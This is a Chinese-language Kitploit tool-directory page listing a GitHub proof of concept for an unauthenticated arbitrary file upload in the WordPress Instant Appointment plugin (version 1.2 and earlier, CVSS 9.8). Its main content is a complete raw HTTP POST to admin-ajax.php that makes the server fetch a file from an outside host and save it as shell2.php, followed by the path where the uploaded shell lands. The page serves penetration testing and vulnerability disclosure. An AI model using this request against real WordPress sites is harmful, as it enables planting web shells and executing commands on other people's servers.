Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
instant-appointment-arbitrary-file-upload — instant-appointment - Arbitrary File upload | Kitploit
工具/GitHubGitHub/randomrobbiebf/instant-appointment-arbitrary-file-upload
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubrandomrobbiebf/instant-appointment-arbitrary-file-upload

instant-appointment-arbitrary-file-upload

instant-appointment - Arbitrary File upload

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
1年前尚未审核

instant-appointment-arbitrary-file-upload

instant-appointment - 任意文件上传

描述

WordPress 的 Instant Appointment 插件在 1.2 及更早版本中存在任意文件上传漏洞。未经身份验证的攻击者可以利用该漏洞上传 shell 并执行命令。

详情

  • 类型:插件
  • Slug:instant-appointment
  • 受影响版本:1.2
  • CVSS 分数:9.8
  • CVSS 评级:高
  • CVSS 向量:CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
  • CVE:
  • 状态:已关闭

POC

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: wp-dev.ddev.site
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: max-age=0
Content-Length: 108

action=add_gallery_to_vendor&user_galerie[0][1]=https://rfi.nessus.org/rfi.txt&user_galerie[0][0]=shell2.php

文件将位于 uploads/2025/1/shell2.php 文件中。

下载工具